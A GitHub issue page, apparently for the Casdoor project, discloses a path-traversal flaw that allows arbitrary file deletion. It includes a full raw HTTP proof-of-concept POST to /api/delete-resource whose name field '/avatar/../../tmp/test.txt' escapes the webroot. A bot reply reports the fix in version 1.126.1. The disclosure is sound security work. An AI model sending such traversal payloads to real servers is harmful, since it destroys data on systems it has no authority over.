Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Arbitrary file delete vulnerability #1171

Closed
gregxsunday opened this issue Sep 30, 2022 · 2 comments · Fixed by #1174
Closed

Arbitrary file delete vulnerability #1171

gregxsunday opened this issue Sep 30, 2022 · 2 comments · Fixed by #1174
Assignees
Labels
question Further information is requested released

Comments

@gregxsunday
Copy link

Hi,

I was looking at the fix to #1035:
image

And I noticed it only fixes the path traversal in file upload, while file deletion is still vulnerable.
Thus, it's possible to delete any file outside application's webroot:
poc

POC request:

POST /api/delete-resource?provider= HTTP/1.1
Host: localhost:8008
Content-Length: 363
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://localhost:8008
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8008/resources
Accept-Encoding: gzip, deflate
Accept-Language: en,pl-PL;q=0.9,pl;q=0.8,en-US;q=0.7
Cookie: casdoor_session_id=93862e25f31761d7cde831cdf4b93f14; Hm_lvt_5998fcd123c220efc0936edf4f250504=1664531159; Hm_lpvt_5998fcd123c220efc0936edf4f250504=1664531383
Connection: close

{"owner":"built-in","name":"/avatar/../../tmp/test.txt","createdTime":"2022-09-30T09:49:17Z","user":"admin","provider":"app-built-in","application":"app-built-in","tag":"avatar","parent":"CropperDiv","fileName":"admin.jpeg","fileType":"image","fileFormat":".jpeg","fileSize":159547,"url":"/files/avatar/built-in/admin.jpeg?t=1664531357206668083","description":""}
@casbin-bot
Copy link
Contributor

@casbin-bot
Copy link
Contributor

🎉 This issue has been resolved in version 1.126.1 🎉

The release is available on GitHub release

Your semantic-release bot 📦🚀

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
question Further information is requested released
Projects
None yet
Development

Successfully merging a pull request may close this issue.

3 participants